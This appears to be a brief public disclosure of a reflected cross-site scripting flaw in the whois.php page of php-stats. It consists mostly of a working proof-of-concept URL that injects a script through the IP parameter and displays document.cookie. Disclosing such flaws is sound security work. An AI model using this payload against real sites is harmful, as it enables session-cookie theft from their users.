I have found an xss in whois.php page of php-stats.

http://phpstats.net/

Here is the XSS

php-stats-path/whois.php?IP=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E